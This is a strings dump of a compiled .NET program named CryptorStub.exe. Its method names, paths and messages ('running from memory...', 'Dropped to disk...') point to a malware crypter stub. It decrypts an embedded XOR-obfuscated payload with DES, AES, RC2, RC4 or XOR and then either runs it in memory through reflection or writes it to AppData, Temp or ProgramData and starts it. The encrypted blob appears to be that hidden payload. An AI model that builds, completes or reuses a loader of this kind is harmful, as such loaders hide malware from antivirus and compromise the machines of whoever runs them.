!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
CryptorStub.exe
<Module>
cCrypto
CryptorStub
mscorlib
Object
System
DES_Decrypt
AES_Decrypt
cryptBytes
passBytes
RC2_Decrypt
bytesToBeDecrypted
passwordBytes
RC4_Decrypt
RFC_Decrypt
XOR_Decrypt
Program
random
Random
RandomString
length
.cctor
<>9__2_0
Func`2
<RandomString>b__2_0
CompilationRelaxationsAttribute
System.Runtime.CompilerServices
RuntimeCompatibilityAttribute
DebuggableAttribute
System.Diagnostics
DebuggingModes
AssemblyTitleAttribute
System.Reflection
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
GuidAttribute
AssemblyFileVersionAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
CompilerGeneratedAttribute
TripleDESCryptoServiceProvider
System.Security.Cryptography
MD5CryptoServiceProvider
HashAlgorithm
ComputeHash
AppSettingsReader
System.Configuration
SymmetricAlgorithm
set_Key
set_Mode
CipherMode
set_Padding
PaddingMode
CreateDecryptor
ICryptoTransform
TransformFinalBlock
Rfc2898DeriveBytes
MemoryStream
System.IO
CryptoStream
Encoding
System.Text
get_UTF8
GetBytes
System.Core
AesManaged
set_KeySize
get_KeySize
DeriveBytes
get_BlockSize
set_IV
Stream
CryptoStreamMode
IDisposable
Dispose
ToArray
RC2CryptoServiceProvider
set_BlockSize
Create
Dictionary`2
System.Collections.Generic
MethodInfo
Environment
GetFolderPath
SpecialFolder
GetTempPath
ExpandEnvironmentVariables
RSACryptoServiceProvider
String
Substring
Convert
FromBase64String
op_Equality
AppDomain
get_CurrentDomain
Assembly
get_EntryPoint
MemberInfo
get_Name
CreateInstance
MethodBase
GetParameters
ParameterInfo
Invoke
Console
WriteLine
Contains
Directory
GetDirectories
Concat
get_Item
WriteAllBytes
Process
Enumerable
System.Linq
Repeat
IEnumerable`1
Select
get_Length
get_Chars
WrapNonExceptionThrows
CryptorStub
Copyright
2021
$389618fb-059f-4b3f-bd95-78bcbccc42a4
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
@.#|.;
saltbyte
D495560961CCCFE0
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
%APPDATA%
%TEMP%
%PROGRAMDATA%
%ProgramData%
xor:qMgc55mE5ZKI5aaTGm2M6Sqx5aaT6ZKxpZOB55qE5ZKM55qE5ZKM5aaT5ZKM6ZKx5aaT6ZKx5ZOB55qEZZKM55SbX5yMUa9exCqNpV+Qsc76mrLBl/zmlfvpxfHtifTrkbLugIbhkPysgPyRoenAyf/egfav6peOwZKM55qE5ZLcoKaTqZOP6X0G+MOT6ZKx5ZOB53qE55OH5pKE5TSP5aaV5ZKM6ZKx22OQ6ZKR5ZOBB5mE5ZLM55qk5ZKM56aT4ZKM6ZKx5aaX6ZKx5ZOB55qk4ZKM5ZqE5ZKM5aSTpReM6YKx5baT6ZKx9ZOB95qE5ZKM54qE5ZKM5aaT5ZKM6WJ15qbY6ZKx5XOC57KH5ZKM55qE5ZKM5aaT5ZKM6ZKx5aaX6Z6x5ZOB55qE5ZKM55qE5ZKM5aaT5ZKM6ZKx5aaT6ZKx5ZOB55qE5ZKM55qE5ZKM5aaT5ZKMyZKx7aaT6ZKx5ZOB55qE7bKM59KE5ZKM5aaT5ZKM6bzFgN7n6ZKxoTaC55qk5ZKMQZmE5ZCM5aaT5ZKM6ZKx5aaT6bKx5fOvlen2hpKM57KH5ZKMBaWT5ZaM6ZIZ5qaT6ZKx5ZOB55qE5ZLM55rEy+Dpicnw5ZKA6ZKx5aaX6ZKz5ZOBS5mE5ZKM55qE5ZKM5aaTpZKMq5Kx5aaT6ZKx5ZOB55qE5ZKsIpmE5ZKM5e6T5ZKO6ZexZa6R6eIN5JOC55qEx5KM4VIK5JI0nKaT5ZKM6ZKx5aaT6ZKx5ZOB55qE5ZKM55qE5ZKM5aaT5ZKM6ZKx5aaT6bhP7JOBz6+E5ZimzWSN5ZL34qaT4bj667qH5aaZw5Kx+qGkz7iE5ZiH57Kn5ZKGO6aT5bj667qG5aaZw5Kx+qGkz7iE5ZiH57Kn5ZKGO6aT5bhymqqx5awT4ZKx4eC455qOZZuM557335KM7yaZ5ZKImqmx5awT4pKx4bmB54W2wLqu55qO7pKkxqaT70yM6ZKb+6S7r5Kx77kv5OHo5ZKIx5qExZK/4qWEzTaM
Memory
running from memory...
%RANDOM%
Dropped to disk...
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789